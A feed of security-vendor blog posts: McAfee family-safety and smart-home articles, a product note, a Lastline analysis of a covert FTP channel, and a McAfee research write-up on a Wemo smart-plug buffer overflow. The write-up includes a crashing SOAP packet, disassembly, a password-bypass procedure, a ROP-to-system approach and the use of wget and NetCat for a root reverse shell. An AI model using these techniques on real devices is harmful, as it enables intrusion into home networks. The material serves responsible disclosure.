Screentime is on the rise, and there’s no indication that trend is going to change. If we want kids that know the value of building an emotionally and physically healthy life, then teaching (and modeling) balance is imperative today. Digital Parenting Skills: Model screentime balance in your life. Be proactive in planning device-free activities for the whole family, and use software that will help you establish time limits on all devices. You might be surprised how just a few small shifts in your family’s tech balance can influence the entire vibe of your home.

Reputation Management

digital parenting

Most kids work reasonably hard to curate and present a specific image on their social profiles to impress their peers. Few recognize that within just a few years, colleges and employers will also be paying attention to those profiles. One study shows that 70% of employers use search engines and social media to screen candidates. Your child’s digital footprint includes everything he or she says or does online. A digital footprint includes everything from posts to casual “likes,” silly photos, and comments. Digital Parenting Skills: Know where your kids go online. Monitor their online conversations (without commenting publically). Don’t apologize for demanding they take down inappropriate or insensitive photos, comments, or retweets. The most important part of monitoring is explaining why the post has to come down. Simply saying “because I said so,” or “that’s crude,” isn’t enough. Take the time to discuss the reasons behind the rules.

Security and Safetydigital parenting

It’s human nature: Most us aren’t proactive. We don’t get security systems for our homes or cars until a break-in occurs to us or a close friend. Often, we don’t act until it gets personal. The same is true for taking specific steps to guard our digital lives. Digital Parenting Skills: Talk to your kids about online risks including scams, viruses and malware, identity fraud, predators, and catfishing. Go one step further and teach them about specific tools that will help keep them safe online. The fundamentals of digital safety are similar to teaching kids habits such as locking the doors, wearing a seatbelt or avoiding dangerous neighborhoods.

Your kids may be getting older and may even shrug off your advice and guidance more than they used to but don’t be fooled, parents. Kids need aware, digitally savvy parents more than ever to navigate and stay safe — both emotionally and physically — in the online arena. Press into those hard conversations and be consistent in your digital parenting to protect the things that truly matter.

Want to connect more to digital topics that affect your family? Stop by ProtectWhatMatters.online. Also, join the digital security conversation on Facebook.

 

Toni Birdsong is a Family Safety Evangelist to McAfee. You can find her onTwitter @McAfee_Family. (Disclosures)

The post 5 Reasons Why Strong Digital Parenting Matters More than Ever appeared first on McAfee Blogs.

Inside a Modern-Day Smart Home

Ever wonder how the Internet of Things (IoT) first began? Often regarded as the first IoT device, John Romkey created a toaster that could be turned on and off over the internet for the October ’89 INTEROP conference. Then in 2000, LG announced its first internet refrigerator plans. So on and so forth IoT grew and grew, populating homes everywhere. Soon enough, we got the smart home. Though the name itself has become household, many people may not fully understand the ins and outs of a smart home. And beyond that, many don’t know the security implications tied to it. Let’s take a look.

Popularity via Convenience

According to Gartner, 20.8 billion connected devices are predicted to exist in consumer homes by 2020. So why have these devices and the smart homes they fill boomed so drastically in popularity in the past few years? One word: convenience.

If we use enough of them, these devices automate our daily existence. They turn our lights on for us, flip music on at the sound of our voice, even change the temperature in our house. And they’ve become all too easy to accumulate since the technology has started to become more affordable. A few of the key and common smart devices that can be found in a modern smart home include smart refrigerators, smart lights, smart speakers, smart TVs. Beyond that, more family-oriented devices are becoming smart — including baby cams, thermometers, and children’s toys.

As we look ahead, it’s been predicted that the type of devices that are “smart” will grow to become more diverse, driving wider adoption. And that will cause more businesses to jump on the IoT train — builders, developers and anyone in the world of residential life are going to link up with smart tech.

The Digital (and Physical) Impact of IoT

But the continuous growth of these devices, now and in the future, is something we all have to smart about. These IoT devices are convenient, but their build makes them a convenient target for cybercriminals. This is because many IoT devices aren’t built with security in mind, and users often leave default settings on, which makes it easy for hackers to breach them. Just take the McAfee ATR team’s recent discovery about the Wemo Insight Smart Plug for example – the device was found to contain a crucial vulnerability that could allow hackers to manipulate it. Not to mention, digital assistants are susceptible to something called a ‘Dolphin Attack,’ which can be leveraged by cybercriminals to potentially breach a user.

And since all these IoT devices must connect to Wi-Fi, they can expose an entire network to threats. In fact, according to a recent McAfee survey, the biggest worry among recent respondents about having their wireless home network hacked is that cybercriminals could steal personal information and make them a victim of identity theft (63%).

There are physical repercussions to a vulnerable IoT device as well. Once they’ve hacked a connected device, cybercriminals can also manipulate the device itself and can flip the lights off, listen in on your smart baby monitor, the list goes on.

Connecting With Care

The good news is there are a few things we can all do to prevent IoT attacks and still enjoy our smart homes. First things first, we must all buy IoT devices with security in mind. Just by doing some basic research and looking up the manufacturers, we can get a feel if they have security top of mind. Most importantly, we have to change default settings and use a security solution that protects our homes at the router-level, such as McAfee Secure Home Platform.

By following these best practices, we can live our connected lives with confidence and enjoy the convenience of our high-tech homes. Both our homes and our personal security will remain smart.

To learn more about smart homes and IoT, be sure to follow us at @McAfee and @McAfee_Home.

The post Inside a Modern-Day Smart Home appeared first on McAfee Blogs.

Family Tech: How Safe is Your Child’s Personal Data at School?

Kids and Personal DataRight about now, most kids are thinking about their chemistry homework, the next pep rally, or chiming in on their group text. The last thing on their minds as they head back to school is cybersecurity. But, it’s the one thing — if ignored — that can wreck the excitement of a brand new school year.

You’ve done a great job, parent. You’ve equipped their phones, tablets, and laptops with security software. And, you’ve beefed up safeguards on devices throughout your home. These efforts go a long way in protecting your child’s (and family’s) privacy from prying eyes. Unfortunately, when your child walks out your front door and into his or her school, new risks await.

No one knows this season better than a cybercriminal. Crooks know there are loopholes in just about every school’s network and that kids can be easy targets online. These security gaps can open kids up to phishing scams, privacy breaches, malware attacks, and device theft.

The school security conversation

Be that parent. Inquire about your school’s security protocols.  The K-12 Cybersecurity Resource Center reports that 358 school breaches have taken place since January of 2016.  Other reports point to an increase in hackers targeting school staff with phishing emails and seeking student social security numbers to sell on the dark web.

A few questions to consider:Kids and Personal Data

  • Who has physical and remote access to your student’s digital records and what are the school’s protection practices and procedures?
  • How are staff members trained and are strong password protocols in place?
  • What security exists on school-issued devices? What apps/software is are being used and how will those apps collect and use student data?
  • What are the school’s data collection practices? Do data collection practices include encryption, secure data retention, and lawful data sharing policies?
  • What is the Bring Your Own Device (BYOD) policy?

The data debate

As K-12 administrators strive to maintain secure data collection practices for students, those same principles may be dubious as kids move on to college. As reported by Digiday, one retailer may be quietly disassembling privacy best practices with a bold “pay with data” business model. The Japanese coffee chain Shiru Café offers students and faculty members of Brown University free coffee in exchange for entering personal data into an online registry. Surprisingly, the café attracts some 800 customers a day and is planning on expanding its business model to more college campuses.

The family conversation

Keep devices close. Kids break, lose, lend, and leave their tech unattended and open to theft. Discuss responsible tech ownership with your kids. Stolen devices are privacy gold mines.

Never share passwords. Kids express their loyalty to one another in different ways. One way that’s proving popular but especially unsafe nowadays is password sharing. Remind kids: It’s never okay to share passwords to devices, social networks, or school platforms. Never. Password sharing opens up your child to a number of digital risks.

Safe clicking, browsing practices. Remind kids when browsing online to watch out for phishing emails, fake news stories, streaming media sites, and pop-ups offering free downloads. A bad link can infect a computer with a virus, malware, spyware, or ransomware. Safe browsing also includes checking for “https” in the URL of websites. If the website only loads with an “http,” the website may not be enforcing encryption.Kids and Personal Data

Be more of a mystery. Here is a concept your kids may or may not latch on to but challenge them to keep more of their everyday life a mystery by posting less. This includes turning off location services and trying to keep your whereabouts private when sharing online. This challenge may be fun for your child or downright impossible, but every step toward boosting privacy is progress!

Discuss the risk of public Wi-Fi. Kids are quick to jump on Wi-Fi wherever they go so they can use apps without depleting the family data plan. That habit poses a big problem. Public Wi-Fi is a magnet for hackers trying to get into your device and steal personal information. Make sure every network your child logs on to requires a password to connect. Go a step further and consider using a Virtual Private Network (VPN) for added security for your whole family.

Want to connect more to digital topics that affect your family? Stop by ProtectWhatMatters.online, and follow @McAfee_Family on Twitter. Also, join the digital security conversation on Facebook.

Toni Birdsong is a Family Safety Evangelist to McAfee. You can find her onTwitter @McAfee_Family. (Disclosures)

The post Family Tech: How Safe is Your Child’s Personal Data at School? appeared first on McAfee Blogs.

Microsoft MCSE Certification: Your Next Big Step in IT Career

Microsoft MCSE is the most in-demand certification for all those professionals who work in the Information Technology industry. Most IT companies prefer hiring those workers who carry the Microsoft MCSE certificate. That is why most of the IT job applicants today try to get certified by Microsoft. In the competitive job market, MCSE helps an […]

‘Insight’ into Home Automation Reveals Vulnerability in Simple IoT Product

Eoin Carroll, Charles McFarland, Kevin McGrath, and Mark Bereza contributed to this report. 

The Internet of Things promises to make our lives easier. Want to remotely turn lights and appliances on and off and monitor them online? A “smart plug,” a Wi-Fi–connected electric outlet, is one simple method. But IoT devices can turn into attack vectors if they are not properly secured.

The McAfee Labs Advanced Threat Research team is committed to uncovering security issues in both software and hardware to help their developers provide safer products for businesses and consumers. We recently investigated a consumer product produced by Belkin. Our research into the Wemo Insight Smart Plug led to the discovery of an unreported buffer overflow in the libUPnPHndlr.so library. This flaw, CVE-2018-6692, allows an attacker to execute remote code. Following our responsible disclosure policy, we reported this research to Belkin on May 21.

Can this vulnerability lead to a useful attack? A smart plug by itself has a low impact. An attacker could turn off the switch or at worst possibly overload the switch. But if the plug is networked with other devices, the potential threat grows. The plug could now be an entry point to a larger attack. Later in this report, we will look at one possible attack.

Exploring the attack surface

Following the manual’s advice, the team used the Wemo phone application to set up the smart plug. We were able to remotely turn the outlet on and off. We then tested the software, including port scanning, monitoring normal network traffic, and reading online research. The Wemo listens on Universal Plug and Play (UPnP) ports TCP 49152 and 49153. The manuals, disassembly images, and the general-purpose programming language (GPL) were all online; they provided information on CPU architecture, the operating system, and applications.

We turned to the hardware and disassembled the device. We identified chips on the main board, found headers for communicating with the device, and pulled the memory off flash. Our online research provided datasheets for each of the chips on the board.

We found universal asynchronous receiver-transmitter (UART) pads on the board and confirmed them with the documentation. We soldered wires to these headers to discover if they were actively transmitting. To test communication with the device, we used an Exodus XI Breakout board, shown below:

After brute-forcing the baud rate, we were able to get debug information via the UART interface. The UART also provided a login prompt; however, neither online research nor simple guessing led us to a working password.

Extraction and firmware analysis

The flash chip discovered on the board was a Maxronix MX25L12835F, which is supported by flashrom, a well-known open-source tool for extracting firmware. Using flashrom and the XI Breakout board, we extracted the firmware from the Wemo device. After we obtained the original firmware image shipped with the device, we updated it using the Wemo mobile application. Once the device was updated, we again extracted the firmware from the device, providing us with a second image. We ran basic sanity checks with the new firmware to ensure our earlier software reconnaissance had not changed.

With the firmware extracted, we analyzed the firmware using binwalk, an open-source binary analysis tool. Binwalk extracted the file system from the firmware for further inspection. Access to the file system allowed us to review system configuration and access binaries.

Finding a vulnerability 

Network or remote vulnerabilities are more dangerous than local flaws, so we took a close look at the UPnP ports listening on the local network. During this testing phase our lead analyst was taking a class on Exodus Intelligence Embedded Exploitation. One of the class instructors, Elvis Collado (@b1ack0wl) was developing a UPnP fuzzer and offered to assist our efforts. Using this tool we started fuzzing the open UPnP ports, while monitoring the UART interface on the Wemo. After a short time we saw a crash on the UART interface.

11:37:16.702 stuntsx0x46ac6 STUN client transaction destroyed
sending SIGSEGV to wemoApp for invalid write access to
464d4945 (epc == 2ac1fb58, ra == 2ac1fccc)
Cpu 0
$ 0 : 00000000 00000001 0000006d 464d4945
$ 4 : 31d2e654 31d2e770 00000003 00000001
$ 8 : 0000007c fffffff8 00000007 00000002
$12 : 00000200 00000100 00000807 00000800
$16 : 31d2e6f0 31d2e898 004a1cb8 00000002
$20 : 31d2e638 31d2e6c0 004a1388 31d2e640
$24 : 00000400 2ac1fb30
$28 : 2ac77d40 31d2e600 31d2e648 2ac1fccc
Hi : 00000008
Lo : 00000000
epc : 2ac1fb58 Tainted: P
ra : 2ac1fccc Status: 0100fc13 USER EXL IE
Cause : 8080000c
BadVA : 464d4945
PrId : 0001964c
Modules linked in: softdog rt_rdm rt2860v2_ap(P) raeth
Process wemoApp (pid: 2157, threadinfo=80fa0000, task=802c87f0)
Stack : 2a0000d0 fffffffe 31d2e6f0 31d2e770 31d2e76f 31d2e6f0 31d2e6f0 31d2e770
00000000 31d2e604 00000000 00000000 2ac77d40 00000000 4f464751 4a484d4c
4e444241 47454f49 50464658 45414d42 43445044 464d4945 5552414c 46495048
4b524141 41445a4f 44534e4a 4e4e494c 44434357 494a4855 44515455 44494b45
55584a44 584e4f52 545a5247 51545954 595a4c42 4e594a45 484f5158 46474944

Call Trace:

Code: 80a20000 50480004 a0600000 <5440fffa> a0620000 a0600000 10a00006 24840004 24a50001
thready: Destructor freeing name “ChildFDTask”.
Aborted

After repeating and closely observing the experiment several times, we determined that the crash was caused by the following packet:

POST /upnp/control/basicevent1 HTTP/1.1
Host: 192.168.225.183:49154
User-Agent: python-requests/2.9.1
Accept: */*
Connection: keep-alive
SOAPAction: “urn:Belkin:service:basicevent:1#UpdateInsightHomeSettings”
Content-Type: text/xml
Accept-Encoding: gzip, deflate
Content-Length: 3253

<?xml version=”1.0″ ?><s:Envelope s:encodingStyle=”http://schemas.xmlsoap.org/soap/encoding/” xmlns:s=”http://schemas.xmlsoap.org/soap/envelope/”><s:Body><b1ack0wl_ns:UpdateInsightHomeSettingsxmlns:b1ack0wl_ns=”urn:Belkin:service:basicevent:1″><EnergyPerUnitCost>210</EnergyPerUnitCost><Currency>236</Currency><EnergyPerUnitCostVersion>KWWZWIVYBQZKDGSSAAPBCQVQQFAVYZEOEUFIDXXQPDYGESTOD
GIJFERXZNMYAFJQLUZPSIJXFQSPADCRIVHDAJLLPQMPLAVECIQUWLXDLIGPLBKCROGPOCVUI
KTSLIIXULOEBVFKWIERCFGHWHCBBDLWFBKBZXAVGRKTDALDNRPOFQJDXAEOC(…snip…)XHU
OUZPCHUBFGLLWSJBFYFOMCGZZMJIQIUVCDETFBRBZVDVKNBVZFBRSVBSZPAYKZYNQZEQPDV
DWSZNDUPUDCPAVWNFBFBTYMXTBNCWTBJPKORUBHBSCQBPOPOBZNVADMGWRI
</EnergyPerUnitCostVersion></b1ack0wl_ns:UpdateInsightHomeSettings></s:Body></s:Envelope>

For space reasons some of the payload has been removed. (The original data in “EnergyPerUnitCostVersion” was 2,828 characters.) After examining the crash data and the packet, this appears to be a standard buffer overflow, in which data is being overwritten onto the stack. We continued fuzzing, now focused on the “EnergyPerUnitCost” field and found we needed only 32 characters to crash the application.

Although the crash dump provides us with a lot of good information, there is still a lot we do not know. For example, the crash occurs in the “WemoApp” and provides us an offset, but what is the base address of this library? What has been overwritten on the stack? Without access to the application during runtime these questions are difficult to answer. Because we obtained the file system earlier, we could statically analyze the WemoApp binary; but we would still be unable to determine the exact point of the crash easily.

To answer these questions we needed to take one of two paths. We could virtualize the Wemo firmware or binary to continue testing; or if we could determine the root password on the UART interface, there is a chance we could debug on the device itself. Generally, virtualizing firmware is not simple and can sometimes lead to inaccurate test results. It is better to debug on the device. With all the information we found during reconnaissance, it seemed promising that we could bypass the root password. (We did spend some time attempting to virtualize the WemoApp—with no success.)

Bypassing the root password

From the extracted file system, we learned the Wemo runs the embedded Linux system OpenWRT, with the user account information held in either the standard /etc/passwd or /etc/shadow files. We extracted the hash for the root password from /etc/passwd and submitted it to a cracking rig. This method proved ineffective in a reasonable amount of time.

With our ability to read the flash chip we had a good chance to write to the chip. Barring any checksum or validations done on the firmware, we might be able to replace the /etc/passwd file with a known password.

To test this theory, we would have to repack the firmware. Since the GPL for the Wemo is public, we chose to use the same tools used by the developers. Using the GPL, we compiled the same version of squash tools 3.0 with Izma and repackaged the firmware file system with a modified /etc/passwd file. We added padding to ensure the firmware section was the same size as the original. We then used “dd” to insert the new file system segment into the firmware binary. During this process, we discovered that using binwalk to extract the firmware prevented us from correctly repackaging the firmware. We used “dd” with the information provided by binwalk to extract the correct section of the firmware binary for repackaging.

With a new firmware binary in hand, we used the XI Breakout board and flashrom to write the firmware to the flash chip on the board. After rebooting the device, we were able to log in using the new password.

Analyzing the crash 

With root access on the Wemo, we could gather more information about the crash during the UPnP fuzzing. First, we needed to compile the tools required to perform more in-depth analysis for this specific architecture. Using the GPL, we compiled gdbserver and gdb for the device. The Wemo had a large amount of installed tools, such as “wget,” making it simple to add files. We downloaded and executed the tools from the /tmp directory.

After a large amount of trying, we failed to get gdb running directly or remotely with the device. So we used gdbserver, in conjunction with Interactive Disassembler Pro, for all debugging. With the debugger connected, we sent the packet causing the crash and saw the exact location of the crash. A segmentation fault occurred at address 0x2AC15B98. From the memory layout from the Linux “proc” directory, we determined his memory address resides in library libUPnPHndlr.so.

2abf3000-2ac4d000 r-xp 00000000 1f:02 82 /rom/lib/libUPnPHndlr.so

Because the crash was caused by a UPnP packet, it was logical to find the crash inside this library . With the base address 0x2abf3000, we calculated the offset for static analysis in IDA to be 0x22b98.  At this address, we found the following:

LOAD:00022B70  # =============== S U B R O U T I N E =======================================

LOAD:00022B70

LOAD:00022B70

LOAD:00022B70                 .globl TokenParser

LOAD:00022B70 TokenParser:                             # CODE XREF: ProcessEnergyPerunitCostNotify+84↓p

LOAD:00022B70                                          # DATA XREF: LOAD:00004210↑o …

LOAD:00022B70                 beqz    $a1, locret_22BC0

LOAD:00022B74                 move    $a3, $zero

LOAD:00022B78                 move    $a3, $zero

LOAD:00022B7C                 b       loc_22BB4

LOAD:00022B80                 li      $t0, 0x7C  # ‘|’

LOAD:00022B84  # —————————————————————————

LOAD:00022B84

LOAD:00022B84 loc_22B84:                               # CODE XREF: TokenParser+28↓j

LOAD:00022B84                 addiu   $a1, 1

LOAD:00022B88                 addiu   $v1, 1

LOAD:00022B8C

LOAD:00022B8C loc_22B8C:                               # CODE XREF: TokenParser+48↓j

LOAD:00022B8C                 lb      $v0, 0($a1)

LOAD:00022B90                 beql    $v0, $t0, loc_22BA4

LOAD:00022B94                 sb      $zero, 0($v1)

LOAD:00022B98                 bnezl   $v0, loc_22B84

LOAD:00022B9C                 sb      $v0, 0($v1)

LOAD:00022BA0                 sb      $zero, 0($v1)

LOAD:00022BA4

LOAD:00022BA4 loc_22BA4:                               # CODE XREF: TokenParser+20↑j

LOAD:00022BA4                 beqz    $a1, locret_22BC0

LOAD:00022BA8                 addiu   $a0, 4

LOAD:00022BAC                 addiu   $a1, 1

LOAD:00022BB0                 addiu   $a3, 1

LOAD:00022BB4

LOAD:00022BB4 loc_22BB4:                               # CODE XREF: TokenParser+C↑j

LOAD:00022BB4                 slt     $v0, $a3, $a2

LOAD:00022BB8                 bnezl   $v0, loc_22B8C

LOAD:00022BBC                 lw      $v1, 0($a0)

LOAD:00022BC0

LOAD:00022BC0 locret_22BC0:                            # CODE XREF: TokenParser↑j

LOAD:00022BC0                                          # TokenParser:loc_22BA4↑j

LOAD:00022BC0                 jr      $ra

LOAD:00022BC4                 move    $v0, $a3

LOAD:00022BC4  # End of function TokenParser

 

Because the developers left the binary unstripped, we can name this function TokenParser. The segmentation fault occurs at a branch instruction; however, in MIPS the delay instruction is executed before the branch occurs. Thus the instruction at 0x22B9C is causing the crash. Here the application attempts to load what is at the address stored in $v1 and place it in $v0. Taking a look at the registers, we find the data from our packet in XML tags “EnergyPerUnitCostVersion” is in $v1, leading to an “invalid write access” segmentation fault error.

After statically analyzing the function, it appears to copy data from one section to another, looking three times for a 0x7C or “|” character. If it never finds the “|,” it keeps copying into a statically defined buffer. To fully understand why the overwrite occurs, let’s take a look at the stack as we step through the function:

2EF17630 2AC692F0 MEMORY:2AC692F0
2EF17634 00000000 MEMORY:saved_fp
2EF17638 34333231 MEMORY:34333231 ← previously copied data
2EF1763C 00000035 MEMORY:retaddr+31  ← next byte will be written at 0x2EF1763D
2EF17640 00000000 MEMORY:saved_fp  ← zeroed out memory prepared for the copy
2EF17644 00000000 MEMORY:saved_fp
2EF17648 00000000 MEMORY:saved_fp
2EF1764C 00000000 MEMORY:saved_fp
2EF17650 2EF17638 MEMORY:2EF17638 ← start writing at this address; can be overwritten

As the function copies data onto the stack, it eventually copies over the address for the original buffer. Once this address is overwritten, the function attempts to write the next byte at the new value, in this case is an invalid address. This overflow gives an attacker two exploitable vectors: a write-what-where condition allows an attacker to write data to an arbitrary location in memory; by continuing to overwrite data on the stack, an attacker can overwrite the $RA register or return address for the calling function, providing the attacker control of the execution flow.

Writing the exploit

Now that that we understand the vulnerability, can we exploit it? Because this is a standard buffer overflow, we need to answer two questions. How much room is available on the stack, and are there any “bad” bytes that cannot make it onto the stack? To determine the available room, we can examine how much of the payload makes it onto the stack if we repair the address overwritten on the stack with a valid address. We learned only 91 bytes can be written onto the stack.

The next step is to determine if there are any “bad” bytes. After running a few tests, we noticed that only ASCII characters can make it onto the stack. Before the vulnerable code is executed, the packet is parsed by the open-source XML parser “mxml.” This library follows the standard of allowing only ASCII and Unicode characters to exist between tags.

This standard is very problematic for both shellcode and return-oriented programming (ROP) techniques because both memory address and shellcode tend to use mostly nonreadable characters. We could use several techniques to combat room on the stack; however, due to the hard limitation on characters that will pass through the XML sanitization process, it would be best to use functions that are already loaded into memory. One method that does not require extensive shellcode is to use a “return to libc” attack to execute the system command. Because the system call typically takes a string as a parameter, this might pass through the filter. Because the Wemo does not use address space layout randomization, if we use ROP it would be theoretically possible to make a call to system without needing to pass additional shellcode through the XML filter.

We still face a major challenge: Only addresses comprising entirely ASCII characters can pass through the XML filter. This drastically limits the potential for finding usable gadgets. We used IDA to see where libc and system are loaded into memory, and found two implementations: in libuClibc-0.9.33.2.so at address 0x2B0C0FD4; and in libpthread-0.9.33.2.so at address 0x2AD104F4. However, neither of these addresses meet the requirements to pass through the XML filter. Thus even if we could create an ROP chain, we would not be able to send just the address for system in the packet.

Addresses with bad characters are not a new problem for exploit development. One of the most common bypasses is to use addition or subtraction ROP gadgets to create the required address in a register and call that register. Again, however, we face the limitation on which operands can be used for this addition or subtraction equation due to the XML filter.

After studying the memory layout, we discovered that libuClibc-0.9.33.2.so sits at a memory location with addresses that can bypass the XML filter. We were fortunate that this is a large library, providing a decent list of addresses, because it is the only library in such a space. With this discovery, the team created a tool to assist with the creation of this exploit. The tool pulls out all possible ROP gadgets with usable memory addresses and determines if an addition or subtraction equation could call one of the two system calls found in memory, using only the values that will bypass the filter. The address for system in libuClibc-0.9.33.2.so, 0x2B0C0FD4, did not have any usable operands. However, 0x2AD104F4 did. We found several “filter-proof” operands that when added together equaled 0x2AD104F4.

We employed our tool’s output for all possible ROP gadgets that bypass the filter to build an ROP chain, which uses an addition instruction to create the final address for system and stores it in $s0. After the addition, another gadget moves the address for system into $t9 and calls system. This final gadget also moves an address that can be controlled from the stack into the register holding the parameter for the system call. The entire ROP chain consists of only three gadgets, which easily fit in the stack space provided by the buffer overflow. 

 

Piecing everything together 

Earlier we discovered two attack techniques that can be used with this vulnerability: a write-what-where, and overwriting the return address on the stack. Each packet sent can use each technique once. To get a parameter to the system call, we must use write-what-where to place the parameter in a writable memory address and pass this address to system. Fortunately, this vulnerable application sets aside a large amount of writable memory that is never used, and in a range accessible to our limited set of addresses that bypass the filter. Unfortunately, the ROP chain that calls system requires the use of write-what-where to handle extra instructions in one of the ROP gadgets. This means that two packets are required to execute the exploit: one to write the parameter for system into memory, and a second to make the call to system. Thus it is important that the first packet exits cleanly and does not crash the program.

One way to execute cleanly is to use three well-placed pipes (“|”) inside the payload to stop writing and exit TokenParser at the appropriate time. It is also important to not overwrite the RA pointer so the program can continue normal execution after the packet is received. Then the second packet is sent containing the ROP chain calling system with the address of the parameter written by the previous packet. 

Payload 

With the discovery of a valid ROP chain that can call system, we must decide what system should call. Because system executes as root, we can gain complete control of the device. Our research has showed that the device has many Linux commands installed. We leveraged this earlier with wget to copy gdbserver to the device. An attacker could also call wget from system to download and execute any script. We explored further for installed applications and found NetCat, which could allow an attacker to write a script to create a reverse shell. An attacker could download a script using wget, and execute the script containing a NetCat command to create a reverse shell. We tested and proved this is one simple, effective method, opening a reverse shell as root. Attackers could choose many other methods to leverage this exploit and execute code. The following video demonstrates this exploit working with a reverse shell.

To illustrate, the team wrote an attack scenario. After the plug is compromised, it could use the built-in UPnP library to poke a hole in the network router. This hole creates a backdoor channel for an attacker to connect remotely, unnoticed on the network. In the following video, we used a remote shell to control a TCL smart TV connected to the network. The Roku API implementation on the TV uses simple unencrypted HTTP GET/POST requests to issue commands and does not authenticate the machine sending these commands, making remote control trivial. Using the Wemo as a middleman, the attacker can power the TV on and off, install or uninstall applications, and access arbitrary online content. Smart TVs are just one example of using the Wemo to attack another device. With the attacker having established a foothold on the network and able to open arbitrary ports, any machine connected to the network is at risk. Because attacks can be conducted through the Wemo and the port mappings generated using this exploit are not visible from the router’s administration page, the attacker’s footprint remains small and hard to detect.

Conclusion 

Discoveries such as CVE-2018-6692 underline the importance of secure coding practices on all devices. IoT devices are frequently overlooked from a security perspective; this may be because many are used for seemingly innocuous purposes such as simple home automation. However, these devices run operating systems and require just as much protection as desktop computers. A vulnerability such as we discovered could become the foothold an attacker needs to enter and compromise an entire business network.

One goal of the McAfee Advanced Threat Research team is to identify and illuminate a broad spectrum of threats in today’s complex and constantly evolving landscape. Through analysis and responsible disclosure, we aim to guide product manufacturers toward a more comprehensive security posture.

The post ‘Insight’ into Home Automation Reveals Vulnerability in Simple IoT Product appeared first on McAfee Blogs.

McAfee ePO Platform Gains Insight Into Threat Research

The latest update to the McAfee® ePolicy Orchestrator® platform offers a new add-in to provide insight into the latest analysis carried out by McAfee Labs and the Advanced Threat Research team. The Security Resources section of the McAfee ePO™ console Version 5.10.0 will contain multiple windows providing the latest news.

The first window in the section shows an updated list of the most recent threats research published by the McAfee Labs team. This includes both malware and vulnerability research. For example, this week we released a report that shows it is possible to emulate and modify a patient’s vital signs in real time on a medical network using a patient monitor and central monitoring station. We also include research related to new malware campaigns. All our content is mapped to the MITRE ATT&CK framework and includes all known indicators of compromise, as well as detailing how McAfee products protect against the documented campaign.

Top threats

The section includes a condensed version of the Threat Landscape Dashboard, which contains the top threats across exploit kits, campaigns, ransomware, and vulnerabilities. The following screen shows how the summary will appear in the McAfee ePO console, allowing readers to easily review and click through these threats for more detail.

The latest McAfee ePO console will offer an easy review of analysis gathered by McAfee Labs and the Advanced Threat Research team.

Top stories
Want to know more? The Top Stories section offers the latest information from McAfee news sources, including new product releases and new blog content (beyond threats analysis).

Support and product advisories

At the bottom right of the screen you will find Security Product Advisories:

  • Support Notification Service: McAfee SNS is a proactive notification service that allows McAfee to communicate critical information in a timely manner on product upgrades, releases, and end-of-life notices. SNS is a vital information link during critical incidents, providing you with the updates you need to ensure that your systems and organization are protected.
  • Product Security Bulletins: McAfee is focused on ensuring the security of our customers’ computers, networks, devices, and data. We are committed to rapidly addressing issues as they arise, and providing recommendations through security bulletins and knowledgebase articles.
  • McAfee Labs Security Advisories: These are a free notification service backed by our global research team. McAfee Labs Security Advisories map high-profile threats to the McAfee technologies that protect your environment.

What next?

You can expect the dashboard to evolve and provide more detail in future versions. Please let us know what you would like to see.

 

The post McAfee ePO Platform Gains Insight Into Threat Research appeared first on McAfee Blogs.

A Wild Port Scan Appears. What now?

Introduction

During the RSA 2018 conference, Lastline launched Breach Defender, a new solution to facilitate the analysis of suspicious anomalies in monitored networks. As part of our internal product QA leading up to any release, we often coordinate with our partners to carry out tests on real data. During our most recent iteration, we happened to detect a port scan within the network of one of our customers (you can see a screenshot of the UI in Figure 1; the orange node represents the event). Normally we tend to gloss over port scans, although we still generate an informational event, as they are often used as part of network security policy to identify hosts running unexpected services. Overall, they are often part of the background noise, and most commonly they are just used to decorate some network activity maps.

Not Your Typical Port Scan

What was unusual in this instance was some additional suspicious activity related to rogue and malformed FTP connections (see the “Suspicious Network Interaction/FTP Based Covert Data Channel” node in Figure 1, click to enlarge). Although quite an old protocol, FTP is still frequently used to exfiltrate data (see the HawkEye keylogger for example). However, a malformed FTP connection can simply be caused by a poorly implemented client. We quickly ruled out this possibility as soon as we noticed how the events were clearly overlapping and involving the very same internal host that had launched the port scan. As visible from the graph, the very same external hosts were also the target/destination of both the port scan and the malformed FTP connection.

It definitely looked like a local host was actively looking for a way to exfiltrate data.

Click to enlarge — port scan initiated by one of the local host

Figure 1: A port scan initiated by one of the local hosts (highlighted) together with some additional suspicious network interaction exploiting an FTP-based covert data channel.

Analyzing the Traffic

It was definitely time to analyze the traffic in a bit more detail. When we started to dig more in depth into the information at our disposal, more and more suspicious inconsistencies surfaced.

First, as displayed in Figure 2 (click to enlarge), our heuristics flagged the hosts as running multiple operating systems. The heuristics build upon network indicators such as user agents or remote endpoints to infer information on the software configuration of each host. The fact that the very same host appears as running two different mobile operating systems (iOS and Android) is unusual and suggests that at least some of the network activities are spoofed. For instance, an iOS application may be hardcoding an Android user agent in its HTTP requests.

Second, the FTP control connection was attempting to store and retrieve the very same file (/home/ftp/db.txt). Note username and password are blank in Figure 2: looking at the raw data, random binary characters appear in those fields, and the characters have been sanitized by our UI. Why would a malicious client want to store and retrieve the same file? Also, the two commands for uploading and downloading are being issued approximately at the same time.

Overall, it felt like something was trying hard to make it look like a legitimate FTP interaction, so we started to suspect we were dealing with something very different. Maybe a clumsy attempt to update a shared resource thereby registering a new infected machine?

Mobile user agents (most likely spoofed) and an anomalous FTP connection that stores and retrieves the very same file.

Figure 2: Mobile user agents (most likely spoofed) and an anomalous FTP connection that stores and retrieves the very same file.

FTP Traffic

To collect further details related to the FTP connections, we queried our backend and sought to select all connections on port 21 outgoing from the internal host that was under investigation. We found 129 connection attempts (to 129 distinct IPs). Of these, only 13 were successful. Every successful connection translated to similar FTP transactions simultaneously attempting to upload and download a resource with the same name.

A quick check on some of the server IPs revealed that they were still responsive. However, attempting to use a normal FTP client to connect led to strange results: the server responses did not match the commands issued by the client. So rather than using a standard client, we switched to a transport level client (the Linux utility netcat) and attempted to deliver manual commands to the server. We managed to replicate the interaction we saw in Figure 2 using netcat. However, when we tried to introduce some variations, it became obvious that the FTP server dialogue, apparently legitimate, was completely scripted: no matter what input the client provided, the server responses were deterministic and “staged.” Figure 3 shows where we “netcat” into the server and type a bunch of random strings, after which the server replies as if the commands were valid.

Apparently, the client and server somehow “emulated” an FTP control channel to establish a seemingly legitimate bidirectional connection over the data channel. Once again, this behavior seemed to be indicative of an infected host trying to reach out to a C&C server using a stealthy connection.

FTP interaction was always leading to the same result

Figure 3: Regardless of our input, the FTP interaction was always leading to the same result, a bidirectional communication channel opened on a port decided by the server (in this instance 42630 as specified by the “Entering Passive Mode” message, where 166 * 256 + 134 = 42630).

